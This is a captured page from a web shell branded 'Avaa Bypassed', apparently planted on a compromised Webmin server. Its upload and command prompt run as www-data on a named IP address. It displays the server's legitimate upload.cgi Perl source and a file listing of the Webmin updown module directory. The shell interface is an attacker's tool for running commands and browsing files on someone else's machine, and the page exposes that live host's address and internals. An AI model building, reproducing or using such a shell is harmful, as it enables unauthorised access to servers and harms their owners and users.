[ Avaa Bypassed ]

Upload:

Command:

www-data@3.137.180.196: ~ $ 
#!/usr/bin/perl
# upload.cgi
# Upload multiple files

require './updown-lib.pl';
&error_setup($text{'upload_err'});
&ReadParse(\%getin, "GET");
$upid = $getin{'id'};
&ReadParseMime($upload_max, \&read_parse_mime_callback, [ $upid ], 1);
foreach my $k (keys %in) {
        $in{$k} = $in{$k}->[0] if ($k !~ /^upload\d+/);
        }
$can_upload || &error($text{'upload_ecannot'});

# Validate inputs
$in{'dir'} || &error($text{'upload_edir'});
if (defined($in{'email_def'}) && !$in{'email_def'}) {
	$in{'email'} =~ /\S/ || &error($text{'upload_eemail'});
	$email = $in{'email'};
	}
if ($can_mode != 3) {
	# User can be entered
	scalar(@uinfo = getpwnam($in{'user'})) ||
		&error($text{'upload_euser'});
	&can_as_user($in{'user'}) ||
		&error(&text('upload_eucannot', $in{'user'}));
	$in{'group_def'} || scalar(@ginfo = getgrnam($in{'group'})) ||
		&error($text{'upload_egroup'});
	$can_mode == 0 || $in{'group_def'} || &in_group(\@uinfo, \@ginfo) ||
		&error($text{'upload_egcannot'});
	}
else {
	# User is fixed
	if (&supports_users()) {
		@uinfo = getpwnam($remote_user);
		}
	}
for($i=0; defined($in{"upload$i"}); $i++) {
	for(my $j=0; $j<@{$in{"upload$i"}}; $j++) {
		$d = $in{"upload${i}"}->[$j];
		$f = $in{"upload${i}_filename"}->[$j];
		$found++ if ($d && $f);
		}
	}
$found || &error($text{'upload_enone'});
&can_write_file($in{'dir'}) ||
	&error(&text('upload_eaccess', "<tt>$in{'dir'}</tt>", $!));

# Switch to the upload user
&switch_uid_to($uinfo[2], scalar(@ginfo) ? $ginfo[2] : $uinfo[3]);

# Create the directory if needed
if (!-d $in{'dir'} && $in{'mkdir'}) {
	mkdir($in{'dir'}, 0755) || &error(&text('upload_emkdir', $!));
	}

&ui_print_header(undef, $text{'upload_title'}, "");

# Save the actual files, showing progress
$msg = undef;
for($i=0; defined($in{"upload$i"}); $i++) {
	for(my $j=0; $j<@{$in{"upload$i"}}; $j++) {
		$d = $in{"upload${i}"}->[$j];
		$f = $in{"upload${i}_filename"}->[$j];
		next if (!$f);
		if (-d $in{'dir'}) {
			$f =~ /([^\\\/]+)$/;
			$path = "$in{'dir'}/$1";
			}
		else {
			$path = $in{'dir'};
			}
		print &text('upload_saving',
			    "<tt>".&html_escape($path)."</tt>"),"<br>\n";
		if (!&open_tempfile(FILE, ">$path", 1)) {
			&error(&text('upload_eopen', "<tt>$path</tt>", $!));
			}
		&print_tempfile(FILE, $d);
		&close_tempfile(FILE);
		push(@uploads, $path);
		@st = stat($path);
		print &text('upload_saved', &nice_size($st[7])),"<p>\n";

		$estatus = undef;
		if ($in{'zip'}) {
			print &text('upload_unzipping',
				    "<tt>$path</tt>"),"<br>\n";
			local ($err, $out);
			$path =~ /^(\S*\/)/;
			local $dir = $1;
			local $qdir = quotemeta($dir);
			local $qpath = quotemeta($path);
			local @files;
			&switch_uid_back();
			if ($path =~ /\.zip$/i) {
				# ZIP file
				if (!&has_command("unzip")) {
					$err = &text('upload_ecmd', "unzip");
					}
				else {
					open(OUT, &webmin_command_as_user($uinfo[0], 0, "(cd $qdir && unzip -o $qpath)")." 2>&1 </dev/null |");
					while(<OUT>) {
						$out .= $_;
						if (/^\s*[a-z]+:\s+(.*)/) {
							push(@files, $1);
							}
						}
					close(OUT);
					$err = $out if ($?);
					}
				$fmt = "zip";
				}
			elsif ($path =~ /\.tar$/i) {
				# Un-compressed tar file
				if (!&has_command("tar")) {
					$err = &text('upload_ecmd', "tar");
					}
				else {
					open(OUT, &webmin_command_as_user($uinfo[0], 0, "(cd $qdir && tar xvf $qpath)")." 2>&1 </dev/null |");
					while(<OUT>) {
						$out .= $_;
						if (/^(.*)/) {
							push(@files, $1);
							}
						}
					close(OUT);
					$err = $out if ($?);
					}
				$fmt = "tar";
				}
			elsif ($path =~ /\.(lha|lhz)$/i) {
				# LHAarc file
				if (!&has_command("lha")) {
					$err = &text('upload_ecmd', "lha");
					}
				else {
					open(OUT, &webmin_command_as_user($uinfo[0], 0, "(cd $qdir && lha xf $qpath)")." 2>&1 </dev/null |");
					while(<OUT>) {
						$out .= $_;
						if (/(\S[^\t]*\S)\s+\-\s+/) {
							push(@files, "/".$1);
							}
						}
					close(OUT);
					$err = $out if ($?);
					}
				$fmt = "lha";
				}
			elsif ($path =~ /\.(tar\.gz|tgz|tar\.bz|tbz|tar\.bz2|tbz2)$/i) {
				# Compressed tar file
				local $zipper = $path =~ /bz(2?)$/i ? "bunzip2"
								    : "gunzip";
				if (!&has_command("tar")) {
					$err = &text('upload_ecmd', "tar");
					}
				elsif (!&has_command($zipper)) {
					$err = &text('upload_ecmd', $zipper);
					}
				else {
					open(OUT, &webmin_command_as_user($uinfo[0], 0, "(cd $qdir && $zipper -c $qpath | tar xvf -)")." 2>&1 </dev/null |");
					while(<OUT>) {
						$out .= $_;
						if (/^(.*)/) {
							push(@files, $1);
							}
						}
					close(OUT);
					$err = $out if ($?);
					}
				$fmt = $zipper eq "gunzip" ? "tgz" : "tbz2";
				}
			else {
				# Doesn't look possible
				$err = $text{'upload_notcomp'};
				}
			&switch_uid_to($uinfo[2],
				       scalar(@ginfo) ? $ginfo[2] : $uinfo[3]);
			if (!$err) {
				my $jn = join("<br>",
					      map { "&nbsp;&nbsp;<tt>$_</tt>" }
						  @files);
				if ($in{'zip'} == 2) {
					unlink($path);
					$ext{$path} = $text{'upload_deleted'}.
						      "<br>".$jn;
					}
				else {
					$ext{$path} = $text{'upload_extracted'}.
						      "<br>".$jn;
					}
				}
			else {
				$ext{$path} = &text('email_eextract', $err);
				}
			$estatus = $err ? &text('email_extfailed', $err)
					: &text('email_extdone_'.$fmt);
			print &text('upload_unzipdone', $estatus),"<p>\n";
			}

		# Add to email message
		$msg .= &text('email_upfile', $f)."\n";
		$msg .= &text('email_uppath', $path)."\n";
		$msg .= &text('email_upsize', &nice_size($st[7]))."\n";
		if ($estatus) {
			$msg .= &text('email_upextract', $estatus)."\n";
			}
		$msg .= "\n";
		}
	}

# Switch back to root
&switch_uid_back();

# Save the settings
if ($module_info{'usermin'}) {
	&lock_file("$user_module_config_directory/config");
	$userconfig{'dir'} = $in{'dir'};
	&write_file("$user_module_config_directory/config", \%userconfig);
	&unlock_file("$user_module_config_directory/config");
	}
else {
	&lock_file("$module_config_directory/config");
	$config{'dir_'.$remote_user} = $in{'dir'};
	$config{'user_'.$remote_user} = $in{'user'};
	$config{'group_'.$remote_user} = $in{'group_def'} ? undef
							   : $in{'group'};
	&write_file("$module_config_directory/config", \%config);
	&unlock_file("$module_config_directory/config");
	}

# Send email
if ($email && $msg) {
	$msg = $text{'email_upmsg'}."\n\n".$msg;
	&send_email_notification($email, $text{'email_subjectu'}, $msg);
	}

&webmin_log("upload", undef, undef, { 'uploads' => \@uploads });

&ui_print_footer("index.cgi?mode=upload", $text{'index_return'});

Filemanager

DIR : / usr/ share/ webmin/ updown/
Name Type Size Permission Actions
images Folder 0755
lang Folder 0755
CHANGELOG File 876 B 0644
acl_security.pl File 1.74 KB 0755
cancel.cgi File 850 B 0755
config File 34 B 0644
config.info.ca File 376 B 0644
config.info.cz File 0 B 0644
defaultacl File 42 B 0644
download.cgi File 4.58 KB 0755
download.pl File 1.39 KB 0755
fetch.cgi File 3.1 KB 0755
index.cgi File 7.05 KB 0755
log_parser.pl File 986 B 0755
module.info File 210 B 0644
module.info.af File 0 B 0644
module.info.af.auto File 179 B 0644
module.info.ar File 0 B 0644
module.info.ar.auto File 250 B 0644
module.info.be File 0 B 0644
module.info.be.auto File 289 B 0644
module.info.bg File 0 B 0644
module.info.bg.auto File 293 B 0644
module.info.ca File 168 B 0644
module.info.ca.auto File 20 B 0644
module.info.cs File 30 B 0644
module.info.cs.auto File 144 B 0644
module.info.da File 0 B 0644
module.info.da.auto File 183 B 0644
module.info.de File 174 B 0644
module.info.de.auto File 19 B 0644
module.info.el File 0 B 0644
module.info.el.auto File 334 B 0644
module.info.es File 27 B 0644
module.info.es.auto File 152 B 0644
module.info.eu File 0 B 0644
module.info.eu.auto File 180 B 0644
module.info.fa File 0 B 0644
module.info.fa.auto File 267 B 0644
module.info.fi File 27 B 0644
module.info.fi.auto File 137 B 0644
module.info.fr File 38 B 0644
module.info.fr.auto File 166 B 0644
module.info.he File 0 B 0644
module.info.he.auto File 207 B 0644
module.info.hr File 0 B 0644
module.info.hr.auto File 165 B 0644
module.info.hu File 32 B 0644
module.info.hu.auto File 159 B 0644
module.info.it File 26 B 0644
module.info.it.auto File 130 B 0644
module.info.ja File 48 B 0644
module.info.ja.auto File 217 B 0644
module.info.ko File 31 B 0644
module.info.ko.auto File 170 B 0644
module.info.lt File 0 B 0644
module.info.lt.auto File 167 B 0644
module.info.lv File 0 B 0644
module.info.lv.auto File 214 B 0644
module.info.ms File 191 B 0644
module.info.ms.auto File 19 B 0644
module.info.mt File 0 B 0644
module.info.mt.auto File 169 B 0644
module.info.nl File 31 B 0644
module.info.nl.auto File 155 B 0644
module.info.no File 33 B 0644
module.info.no.auto File 158 B 0644
module.info.pl File 147 B 0644
module.info.pl.auto File 20 B 0644
module.info.pt File 0 B 0644
module.info.pt.auto File 176 B 0644
module.info.pt_BR File 0 B 0644
module.info.pt_BR.auto File 185 B 0644
module.info.ro File 0 B 0644
module.info.ro.auto File 191 B 0644
module.info.ru File 49 B 0644
module.info.ru.auto File 256 B 0644
module.info.sk File 26 B 0644
module.info.sk.auto File 145 B 0644
module.info.sl File 0 B 0644
module.info.sl.auto File 159 B 0644
module.info.sv File 0 B 0644
module.info.sv.auto File 190 B 0644
module.info.th File 0 B 0644
module.info.th.auto File 372 B 0644
module.info.tr File 29 B 0644
module.info.tr.auto File 144 B 0644
module.info.uk File 0 B 0644
module.info.uk.auto File 317 B 0644
module.info.ur File 0 B 0644
module.info.ur.auto File 299 B 0644
module.info.vi File 0 B 0644
module.info.vi.auto File 211 B 0644
module.info.zh File 0 B 0644
module.info.zh.auto File 142 B 0644
module.info.zh_TW File 27 B 0644
module.info.zh_TW.auto File 127 B 0644
safeacl File 28 B 0644
uninstall.pl File 340 B 0755
updown-lib.pl File 7.44 KB 0755
upload.cgi File 6.42 KB 0755

© 2025 Coded By Avaa Code.